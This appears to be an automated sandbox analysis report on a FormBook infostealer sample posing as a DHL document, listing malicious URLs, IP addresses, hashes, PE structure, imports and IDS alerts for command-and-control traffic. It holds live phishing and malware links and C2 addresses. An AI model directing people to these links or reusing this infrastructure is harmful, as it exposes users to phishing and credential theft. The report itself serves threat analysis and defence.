	https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	104.17.25.14
	file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zip	Get hash	malicious	Unknown	Browse	172.64.149.23
	Mansourbank Swift-TT379733 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	172.64.41.3
	Mansourbank Swift-TT680169 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	104.18.186.31
	https://e.trustifi.com/#/fff2a0/615048/6b9108/bb6bb8/0c4d40/10c266/f490c9/97ed1b/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/85de28/9434d8/86c8f5/bcad02/214fc7/998ea3/f74550/f15e41/328dbb/f2d014/49d879/3689f7/91b4f6/9617cd/897401/851960/993266/280340/ae6054/337b49/6f0428/673840/abdb07/82b8be/00f4e1/3270c4/922952/b4db4e/e9dcee/3a01c5/962a76/930521/2e7fc6/514759/a95ca8/c37226/be9e63/3c4ec2/89148e/13fdfe/ea86c0/04048b/56ab74/dca15f/97696c/fa7912/512e28/fc9f59/50d13f/4f0114/039a8f/84bd72/2603b6/e0eceb/28f211/4fdb34/a1dc16/2076ef/8e55cf/8f9d2c/0d4402/f5a713/43ec64/fabda1/b6994c/da2da1/2851a8/b04ed3/8cea9a/1e21dc/0abaf5/7df73e/f39a96/1f2244/423c00/5c4e8d	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	104.21.18.171
	https://link.edgepilot.com/s/1b4c2fcb/nQHbBC0YQUOfuyi9X74dgg?u=https://url.usb.m.mimecastprotect.com/s/sZGCCm7Wwmt5092LsBiWSRG4Fz?domain=link.edgepilot.com	Get hash	malicious	Unknown	Browse	104.18.69.40
	https://bawarq.org/r.php?id=YoExsdlTj9ej3sIxs1X7aZn3DzYWS8OQ2	Get hash	malicious	Unknown	Browse	104.18.11.207
	https://d3sdeiz39xdvhy.cloudfront.net	Get hash	malicious	Unknown	Browse	172.67.136.18
VODANETInternationalIP-BackboneofVodafoneDE	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	x86_64.elf	Get hash	malicious	Mirai	Browse	92.73.125.180
	mpsl.elf	Get hash	malicious	Mirai	Browse	84.61.150.162
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	2.elf	Get hash	malicious	Unknown	Browse	178.11.29.177
	2.elf	Get hash	malicious	Unknown	Browse	92.217.143.57
	momo.arm.elf	Get hash	malicious	Mirai	Browse	92.211.109.160
	momo.mpsl.elf	Get hash	malicious	Mirai	Browse	88.73.142.118
	z0r0.i686.elf	Get hash	malicious	Mirai	Browse	178.2.222.124
	1.elf	Get hash	malicious	Unknown	Browse	178.13.237.209
NAMECHEAP-NETUS	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	68.65.122.71
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
	https://pwv95gp5r-xn--r3h9jdud-xn----c1a2cj-xn----p1ai.translate.goog/sIQKSvTC/b8KvU/uoTt6?ZFhObGNpNXBiblp2YkhabGJXVnVkRUJ6YjNWMGFHVnliblJ5ZFhOMExtaHpZMjVwTG01bGRBPT06c1JsOUE+&_x_tr_sch=http&_x_tr_sl=hrLWHGLm&_x_tr_tl=bTtllyql	Get hash	malicious	HTMLPhisher	Browse	63.250.38.199
	DUD6CqQ1Uj.doc	Get hash	malicious	Unknown	Browse	192.64.119.42
	DUD6CqQ1Uj.doc	Get hash	malicious	Unknown	Browse	192.64.119.42
	DUD6CqQ1Uj.doc	Get hash	malicious	Unknown	Browse	192.64.119.42
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
	http://keywestlending.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.219.248.99
	inv#12180.exe	Get hash	malicious	FormBook	Browse	199.192.21.169

Process:	C:\Windows\SysWOW64\unlodctr.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\conged

Download File

Process:	C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.995505376243404
Encrypted:	true
SSDEEP:	6144:lIewEAUdteEsLtM+OoIvJcOCEkbM2HN0f8X7t3N:lIxEAUdNsLN2JcObh2HikXBN
MD5:	6933955882932BDA16391925E4DE6F6C
SHA1:	49FE8AE19DE81AB4F519417BC54D0C3FC5E48BF3
SHA-256:	8B509EA05F71E80552FB9FEDA5A6AA267AA1D604EB272E43C5DDB09AC23168A6
SHA-512:	4223C3D17C6E64B0C420B6E59ADCDF68FBEC009582EDB10BCB89EB75DC8A57729D1F7E9F8AF7CC558F0C634FF29DB8936F0B2F7453889BAE9EC4816B5D7B1866
Malicious:	false
Reputation:	low
Preview:	z..LZ09875C4..9J.SLYI66CwQALY09835C4149JRSLYI66C7QALY09835C4.49J\L.WI.?...@...mPZFcDC[^83>l:(XX,Cq#)yBLV.\-.u{jj?<(<g;;I.QALY098J4J..T^.o3+.tVQ.-..cP^.)....T^.H..uVQ.e8"$dP^.35C4149J..LY.77C.q..Y09835C4.4;KYRGYIb2C7QALY098s!C41$9JR#HYI6vC7AALY29855C4149JTSLYI66C7!ELY29835C434y.RS\YI&6C7QQLY 9835C4!49JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C.%$4-098.fG41$9JR.HYI&6C7QALY09835C4.49*RSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149JRSLYI66C7QALY09835C4149J

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.411698311058059
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DHL DOCS 2-0106-25.exe
File size:	1'601'024 bytes
MD5:	4210cbb8a0431dfcb5d8d945acac3e83
SHA1:	158648ec39528d55bf6d1e93160a0d1f4cc0caf9
SHA256:	25903a945ab1f8a5e285227017e580b88efb235a746d138532c71182d3f8be08
SHA512:	44bb897ce7f5263fa94e8442c4ba1484cdadbe1730ad5b7d65c313072b509ad47e28943da264b4e6911a679bd824b7efbdf8abf693c32746a26faace836cf185
SSDEEP:	49152:UTvC/MTQYxsWR7ax9uTunj8LNXiHfVvBjg:0jTQYxsWRMuTuj8ZXi/jg
TLSH:	9B75D00273D1C062FFAB92334F5AE6514BBC69260123E62F13981DB9BD705B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x677BC5ED [Mon Jan 6 12:00:45 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F7084E82053h
jmp 00007F7084E8195Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F7084E81B3Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F7084E81B0Ah
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F7084E846FDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F7084E84748h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F7084E84731h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0xb0294	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x185000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0xb0294	0xb0400	c28b27543c5cda698d2c3a27ec7f2a51	False	0.9626606826241135	data	7.961726626835604	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x185000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0xa755a	data			1.0003151435216122
RT_GROUP_ICON	0x183d14	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x183d8c	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x183da0	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x183db4	0x14	data	English	Great Britain	1.25
RT_VERSION	0x183dc8	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x183ea4	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-07T12:22:34.557937+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49736	84.32.84.32	80	TCP
2025-01-07T12:22:34.557937+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49736	84.32.84.32	80	TCP
2025-01-07T12:22:59.295922+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49764	188.114.97.3	80	TCP
2025-01-07T12:23:01.842612+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49785	188.114.97.3	80	TCP
2025-01-07T12:23:04.389822+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49801	188.114.97.3	80	TCP
2025-01-07T12:23:44.920953+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49817	188.114.97.3	80	TCP
2025-01-07T12:23:44.920953+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49817	188.114.97.3	80	TCP
2025-01-07T12:23:50.755834+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50007	199.59.243.228	80	TCP
2025-01-07T12:23:53.313917+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50008	199.59.243.228	80	TCP
2025-01-07T12:23:55.881571+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50009	199.59.243.228	80	TCP
2025-01-07T12:23:58.398809+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50010	199.59.243.228	80	TCP
2025-01-07T12:23:58.398809+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50010	199.59.243.228	80	TCP
2025-01-07T12:24:05.167520+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50011	162.251.95.62	80	TCP
2025-01-07T12:24:07.878619+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50012	162.251.95.62	80	TCP
2025-01-07T12:24:10.265406+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50013	162.251.95.62	80	TCP
2025-01-07T12:24:12.814573+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50014	162.251.95.62	80	TCP
2025-01-07T12:24:12.814573+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50014	162.251.95.62	80	TCP
2025-01-07T12:24:19.394126+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50015	134.122.135.48	80	TCP
2025-01-07T12:24:21.947040+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50016	134.122.135.48	80	TCP
2025-01-07T12:24:24.468179+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50017	134.122.135.48	80	TCP
